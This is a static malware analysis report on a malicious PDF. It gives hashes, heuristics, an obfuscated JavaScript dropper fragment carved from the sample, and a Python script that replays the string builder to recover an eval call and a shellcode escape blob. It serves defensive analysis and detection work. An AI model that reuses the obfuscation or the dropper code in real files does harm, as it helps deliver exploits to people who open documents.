Malicious PDF — malware analysis report

Static analysis result for SHA-256 b15b71e90b767b75…

Verdict: MALICIOUS
File type: PDF
Size: 110.1 KB
First seen: 2026-05-04
MD5: 7a0160e6b75241b0cb777cd52eeb7976
SHA-1: 7336456190de20d1dcbaf3ea708f5d84d2e0a824
SHA-256: b15b71e90b767b7595dbe28669d773a38a432948a2ed64564949adecc4aa2f99
Risk score: 106

Malware Insights

MITRE ATT&CK
  • T1059.007 Command and Scripting Interpreter: JavaScript
  • T1566.001 Phishing: Spearphishing Attachment

The PDF contains heavily obfuscated JavaScript: the PDF_JS_EXTREME_STRING_REWRITE_OBFUSCATION heuristic fired on thousands of string-rewrite calls, and the ML classifier independently scores the file as malicious (1.0000). The script is assessed to download and execute a second-stage payload. Because its sink names and payload are only assembled at run time, the exact URL or payload could not be recovered statically; confirming the second stage requires detonating the sample in a sandbox or manually replaying the string builder.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics (3)

  • PDF_JAVASCRIPT (severity: low; 2 related findings): JavaScript action
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF_JS_EXTREME_STRING_REWRITE_OBFUSCATION (severity: critical): PDF JavaScript rewrites strings thousands of times to hide its payload
    The document's JavaScript performs an extreme number of runtime string-rewriting operations (substr/substring/replace/charAt/charCodeAt): it rebuilds its sink names and payload by slicing and replacing junk-interleaved strings, so the literal exploit sinks (util.printf, Collab.getIcon, unescape, eval) never appear to a static scanner. Benign PDF form/calculation scripts use a handful of these calls; obfuscated exploit droppers run into the thousands. This rewrite density has no benign purpose and marks the file as an obfuscated JavaScript exploit even when the specific CVE cannot be statically resolved (the sinks are only assembled at run time).
  • PDF_JS (severity: low): Embedded JS stream
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: javascript_obj0076_000.js
Kind: pdf-javascript-stream
Source: PDF /JS object 76 at offset 0x2C2
Size: 96404 bytes
SHA-256: 2ad25751e15c9885cf1733b3ca121eeca09f5d96b19c6730d652b9791b7ddc54
Script preview (first 1,000 lines of the extracted script):
if((String+'').substr(1,4)==='unct'){
e=((('a1'))).indexOf;
}
c=
';ex{E<Kaz|@I= 9}A",tc+jhMN(-mu8l1)]&2ibnv/5S>d7p'%_sC:o*DU0g4PwfqyWV3k6Q[Gr.';
l='l';
e=e()[((2+3)?'e'+'v':"jkrl23jrkl2")+'a'+l];
s=[];
a='push';
z=c.substr(37,1);s[a](z);z=c.substr(63,1);s[a](z);z=c.substr(26,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(26,1);s[a](z);z=c.substr(48,1);s[a](z);z=c.substr(32,1);s[a](z);z=c.substr(48,1);s[a](z);z=c.substr(33,1);s[a](z);z=c.substr(33,1);s[a](z);z=c.substr(38,1);s[a](z);z=c.substr(22,1);s[a](z);z=c.substr(51,1);s[a](z);z=c.substr(59,1);s[a](z);z=c.substr(12,1);s[a](z);z=c.substr(48,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(30,1);s[a](z);z=c.substr(68,1);s[a](z);z=c.substr(70,1);s[a](z);z=c.substr(70,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(63,1);s[a](z);z=c.substr(20,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(60,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(30,1);s[a](z);z=c.substr(42,1);s[a](z);z=c.substr(63,1);s[a](z);z=c.substr(20,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(46,1);s[a](z);z=c.substr(42,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(60,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(14,1);s[a](z);z=c.substr(68,1);s[a](z);z=c.substr(60,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(68,1);s[a](z);z=c.substr(68,1);s[a](z);z=c.substr(42,1);s[a](z);z=c.substr(63,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(70,1);s[a](z);z=c.substr(60,1);s[a](z);z=c.substr(20,1);s[a](z);z=c.substr(58,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(60,1);s[a](z);z=c.substr(58,1);s[a](z);z=c.substr(30,1);s[a](z);z=c.substr(38,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(30,1);s[a](z);z=c.substr(38,1);s[a](z);z=c.substr(68,1);s[a](z);z=c.substr(58,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(58,1);s[a](z);z=c.substr(20,1);s[a](z);z=c.substr(60,1);s[a](z);z=c.substr(58,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(46,1);s[a](z);z=c.substr(58,1);s[a](z);z=c.
substr(30,1);s[a](z);z=c.substr(38,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(42,1);s[a](z);z=c.substr(70,1);s[a](z);z=c.substr(32,1);s[a](z);z=c.substr(20,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(46,1);s[a](z);z=c.substr(70,1);s[a](z);z=c.substr(30,1);s[a](z);z=c.substr(38,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(68,1);s[a](z);z=c.substr(68,1);s[a](z);z=c.substr(58,1);s[a](z);z=c.substr(30,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(70,1);s[a](z);z=c.substr(70,1);s[a](z);z=c.substr(45,1);s[a](z);z=c.substr(38,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(42,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(30,1);s[a](z);z=c.substr(38,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(58,1);s[a](z);z=c.substr(68,1);s[a](z);z=c.substr(68,1);s[a](z);z=c.substr(20,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(68,1);s[a](z);z=c.substr(68,1);s[a](z);z=c.substr(46,1);s[a](z);z=c.substr(60,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(30,1);s[a](z);z=c.substr(32,1);s[a](z);z=c.substr(36,1);s[a](z);z=c.substr(20,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(32,1);s[a](z);z=c.substr(42,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(1,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(63,1);s[a](z);z=c.substr(63,1);s[a](z);z=c.substr(32,1);s[a](z);z=c.substr(58,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(38,1);s[a](z);z=c.substr(30,1);s[a](z);z=c.substr(63,1);s[a](z);z=c.substr(63,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.substr(29,1);s[a](z);z=c.substr(60,1);s[a](z);z=c.substr(58,1);s[a](z);z=c.substr(30,1);s[a](z);z=c.substr(38,1);s[a](z);z=c.substr(49,1);s[a](z);z=c.sub
... (truncated)
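The builder chain in the preview can be replayed without executing the script, which is the manual step the insight above says static analysis could not finish automatically. The following is an added example (not the report's or the sandbox's own tooling): it takes the alphabet `c` and the first 52 `substr` indices copied from the preview, counts the rewrite calls the PDF_JS_EXTREME_STRING_REWRITE_OBFUSCATION heuristic scores, reconstructs the text the chain pushes, and decodes the `%uXXXX` escapes that fall out into the bytes an `unescape`-fed string occupies in memory. The benign form script and the 1000-call threshold are constructed for the comparison and are not values from the report.

```python
"""Static replay of the substr()/push() string builder seen in the preview.

Added example for this report, not the sandbox's own tooling. Nothing here
executes JavaScript: the chain is parsed with regexes and replayed against
the alphabet string.
"""
import re
from collections import Counter

# Alphabet `c`, copied from the preview. Index 48 is a literal single quote:
# the preview shows it unescaped (an extraction artifact; the JS source has to
# read \' there), and the decoded `if(e('1'))` only parses if 48 is a quote.
ALPHABET = ";ex{E<Kaz|@I= 9}A\",tc+jhMN(-mu8l1)]&2ibnv/5S>d7p'%_sC:o*DU0g4PwfqyWV3k6Q[Gr."

# The substr() indices of the first 52 statements of the chain, in order,
# copied from the preview. builder_text() renders them back into the exact
# `z=c.substr(i,1);s[a](z);` statements shown there (a='push' in the script).
BUILDER_INDICES = [
    37, 63, 26, 1, 26, 48, 32, 48, 33, 33, 38, 22, 51, 59, 12, 48,
    49, 29, 30, 68, 70, 70, 49, 29, 63, 20, 1, 60, 49, 29, 30, 42,
    63, 20, 49, 29, 46, 42, 1, 60, 49, 29, 1, 14, 68, 60, 49, 29,
    68, 68, 42, 63,
]

# Constructed benign AcroForm-style calculation script (not from the sample),
# for the density comparison the heuristic text makes.
BENIGN_FORM_SCRIPT = (
    "var v=this.getField('Amount').value;"
    "if(v.substr(0,1)=='$')v=v.substring(1);"
    "event.value=v.replace(/,/g,'');"
)

REWRITE_CALL = re.compile(r"\.(substr|substring|replace|charAt|charCodeAt)\s*\(")
PERCENT_U = re.compile(r"%u([0-9a-fA-F]{4})")


def builder_text(indices):
    """Render the index list as the chain of statements the sample uses."""
    return "".join(f"z=c.substr({i},1);s[a](z);" for i in indices)


def rewrite_call_density(script):
    """Per-method count of the string-rewriting calls the heuristic scores."""
    return Counter(m.group(1) for m in REWRITE_CALL.finditer(script))


def is_extreme_rewrite(script, threshold=1000):
    """Flag a script whose rewrite-call count is in dropper territory.

    The 1000 cut-off is an assumption for this example; the report only says
    benign scripts use a handful and droppers run into the thousands.
    """
    return sum(rewrite_call_density(script).values()) >= threshold


def rebuild_pushed_string(script, alphabet, table_var="c"):
    """Replay the builder statically: every `c.substr(i,1)` push appends
    alphabet[i]. Only the one-character form is handled; anything else in the
    stream would need a real evaluator rather than a regex."""
    pat = re.compile(rf"\b{re.escape(table_var)}\.substr\((\d+),\s*1\)")
    out = []
    for m in pat.finditer(script):
        i = int(m.group(1))
        if i >= len(alphabet):
            raise ValueError(f"substr index {i} exceeds alphabet length {len(alphabet)}")
        out.append(alphabet[i])
    return "".join(out)


def percent_u_to_bytes(s):
    """unescape('%uXXXX') yields one UTF-16 code unit per escape; the JS
    string stores each as a little-endian byte pair, which is the layout a
    heap-sprayed shellcode string ends up with in memory."""
    return b"".join(int(h, 16).to_bytes(2, "little") for h in PERCENT_U.findall(s))


if __name__ == "__main__":
    js = builder_text(BUILDER_INDICES)
    print("sample:", rewrite_call_density(js), "benign:", rewrite_call_density(BENIGN_FORM_SCRIPT))
    recovered = rebuild_pushed_string(js, ALPHABET)
    # `e` was bound to eval a few lines earlier in the preview ('e'+'v'+'a'+'l'),
    # so this is an eval('1') sanity check followed by the start of a %u blob:
    print(recovered)  # if(e('1'))bjsg='%u8366%ufce4%u85fc%u75e4%ue934%u335f
    print(percent_u_to_bytes(recovered).hex())  # 6683e4fcfc85e47534e95f33
```

Replayed over the 52 statements visible in the preview, the chain yields `if(e('1'))bjsg='%u8366%ufce4%u85fc%u75e4%ue934%u335f`, where `e` is the `eval` reference resolved on the lines just above the chain and the `%u` run is exactly what the `unescape` sink named in the heuristic consumes. Running the same replay over the full 96404-byte stream recovers whatever the rest of the chain pushes, which is the point at which the sink calls and any URL become readable; the regex approach breaks as soon as the sample mixes in `replace` or `charCodeAt` rewrites, so treat a non-`substr` hit in the density counter as the cue to switch to a real JavaScript evaluator.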